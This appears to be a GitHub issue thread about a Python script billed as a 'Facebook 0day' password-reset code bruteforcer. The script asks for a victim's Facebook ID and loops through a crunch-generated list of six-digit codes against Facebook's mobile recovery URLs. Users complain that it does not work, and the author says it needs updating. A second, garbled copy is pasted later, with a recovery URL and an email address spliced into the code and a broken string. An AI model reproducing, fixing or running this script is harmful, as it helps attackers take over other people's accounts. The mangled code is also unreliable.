Open muhommadalmusawi opened 6 years ago
Which Code ? can you point it here?
I tried it on my account and put it in my password and did not extract it. Why
Which Tool You're Talking about?
This script .
.
.
.
.
try: import urllib2, ssl, sys, time, re, os except ImportError: exit("[#] Please install Newer Version of Python!")
if "linux" in sys.platform: os.system('clear') else: os.system('cls')
def banner(): print """
| | | | | (_) | | | | | | | / \ / _|
| | | | |_ | | | |_| | | | | / \/ __ | |
| |/| | ' | | / \ |/ _` | _| | | / | ' | |
\ /\ / | | | | || / | | | (| | | | _/\ () | | | | |
\/ \/|| |||___| |/_,|_| ___/\/|| ||_|
'Facebook 0day' Password reset Code bruteforcer
Author: Muhammad Adeel Mail: Chaudhary1337@gmail.com Blog: http://urdusecurity.blogspot.com
[#] To Get Password list of all possible reset codes, Do it.
root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """
banner() victim_profile = raw_input("[#] Victim Facebook ID: ") password_list = raw_input("[#] Password List: ")
def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = 'https://m.facebook.com/recover/password?u='+victim_profile+'&n='+passw req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex = re.search('password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()
ZerOday()
def main(): if name == 'main': main()
Please Post the Error You Receive.
I did not take any mistake, but the script does not extract the password, which consists of six digits and the recovery code You can modify it to do the job you want Thank
Okay I checked it and you're right. I wrote this 4 years ago and facebook has changed its mechanism so this needs updates but i dnt have enough time, may be at some point i;ll update it.
Thank you Professor
root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """
banner() victim_profile = raw_input("[#] Victim Facebook ID: ")gn_no@hotmail.com password_list = raw_input("[#] Password List: ")
def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = 'https://m.facebook.com/recover/code/?em%5B0%5D=g%2A%2A%2A%40%2A%2A%2A%2A%2A%2A%2A&rm=send_email&c=%2Flogin%2F%3Fskip_api_login%3D1%26ap&hash=AUb6TKatViIQVr6dkfc&refsrc=deprecated&_rdr req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex = re.search('password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()
ZerOday()
def main(): if name == 'main': main()
Hello this code does not work